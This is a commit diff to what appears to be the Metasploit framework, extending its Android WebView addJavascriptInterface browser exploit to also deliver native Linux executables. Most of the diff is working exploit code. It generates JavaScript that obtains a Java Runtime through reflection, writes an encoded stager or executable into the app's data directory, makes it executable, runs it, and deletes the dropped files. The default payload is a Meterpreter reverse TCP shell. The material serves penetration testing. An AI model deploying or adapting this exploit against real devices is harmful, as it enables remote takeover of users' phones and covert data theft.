Browse Source

Add support for native target in addjsif exploit.

joev 3 years ago
parent
commit
00dc6364b5

+ 54
- 27
lib/msf/core/exploit/android.rb View File

@@ -19,7 +19,6 @@ module Exploit::Android
19 19
   }
20 20
 
21 21
   def add_javascript_interface_exploit_js(arch)
22
-    stagename = Rex::Text.rand_text_alpha(5)
23 22
     %Q|
24 23
       function exec(runtime, cmdArr) {
25 24
         var ch = 0;
@@ -47,44 +46,72 @@ module Exploit::Android
47 46
                          .getMethod('getRuntime', null)
48 47
                          .invoke(null, null);
49 48
 
50
-        // libraryData contains the bytes for a native shared object built via NDK
51
-        // which will load the "stage", which in this case is our android meterpreter stager.
52
-        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
49
+        #{payload.arch[0] == ARCH_DALVIK ? stager_js(arch) : linux_exe_js(arch)}
53 50
 
54
-        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
55
-        // another stager which loads android meterpreter from the msf handler.
56
-        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
51
+        return true;
52
+      }
57 53
 
58
-        // get the process name, which will give us our data path
59
-        // $PPID does not seem to work on android 4.0, so we concat pids manually
60
-        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
54
+      for (i in top) { if (attemptExploit(top[i]) === true) break; }
55
+    |
56
+  end
61 57
 
62
-        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
63
-        var stagePath = path + '/#{stagename}.apk';
58
+  def stager_js(arch)
59
+    stagename = Rex::Text.rand_text_alpha(5)
60
+    %Q|
61
+      // libraryData contains the bytes for a native shared object built via NDK
62
+      // which will load the "stage", which in this case is our android meterpreter stager.
63
+      var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
64
+
65
+      // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
66
+      // another stager which loads android meterpreter from the msf handler.
67
+      var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
68
+
69
+      // get the process name, which will give us our data path
70
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
71
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
72
+      var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
73
+      var stagePath = path + '/#{stagename}.apk';
74
+
75
+      // build the library and chmod it
76
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
77
+      runtime.exec(['chmod', '700', libraryPath]).waitFor();
78
+
79
+      // build the stage, chmod it, and load it
80
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
81
+      runtime.exec(['chmod', '700', stagePath]).waitFor();
82
+
83
+      // load the library
84
+      runtime.load(libraryPath);
85
+
86
+      // delete dropped files
87
+      runtime.exec(['rm', stagePath]).waitFor();
88
+      runtime.exec(['rm', libraryPath]).waitFor();
89
+    |
90
+  end
64 91
 
65
-        // build the library and chmod it
66
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
67
-        runtime.exec(['chmod', '700', libraryPath]).waitFor();
92
+  def linux_exe_js(arch)
93
+    platform_list = Msf::Module::PlatformList.new(Msf::Module::Platform::Linux)
68 94
 
69
-        // build the stage, chmod it, and load it
70
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
71
-        runtime.exec(['chmod', '700', stagePath]).waitFor();
95
+    %Q|
96
+      var payloadData = "#{Rex::Text.to_octal(payload.encoded_exe(arch: arch, platform: platform_list), '\\\\0')}";
72 97
 
73
-        // load the library
74
-        runtime.load(libraryPath);
98
+      // get the process name, which will give us our data path
99
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
100
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
101
+      var payloadPath = path + '/#{Rex::Text.rand_text_alpha(8)}';
75 102
 
76
-        // delete dropped files
77
-        runtime.exec(['rm', stagePath]).waitFor();
78
-        runtime.exec(['rm', libraryPath]).waitFor();
103
+      // build the library and chmod it
104
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+payloadData+'" > '+payloadPath]).waitFor();
105
+      runtime.exec(['chmod', '700', payloadPath]).waitFor();
79 106
 
80
-        return true;
81
-      }
107
+      // run the payload
108
+      runtime.exec(['/system/bin/sh', '-c', payloadPath + ' &']).waitFor();
82 109
 
83
-      for (i in top) { if (attemptExploit(top[i]) === true) break; }
110
+      // delete dropped files
111
+      runtime.exec(['rm', payloadPath]).waitFor();
84 112
     |
85 113
   end
86 114
 
87
-
88 115
   # The NDK stager is used to launch a hidden APK
89 116
   def ndkstager(stagename, arch)
90 117
     data = MetasploitPayloads.read('android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')

+ 2
- 2
modules/exploits/android/browser/webview_addjavascriptinterface.rb View File

@@ -67,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
67 67
         ['EDB', '31519'],
68 68
         ['OSVDB', '97520']
69 69
       ],
70
-      'Platform'            => 'android',
71
-      'Arch'                => ARCH_DALVIK,
70
+      'Platform'            => ['android', 'linux'],
71
+      'Arch'                => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
72 72
       'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
73 73
       'Targets'             => [ [ 'Automatic', {} ] ],
74 74
       'DisclosureDate'      => 'Dec 21 2012',

Loading…
Cancel
Save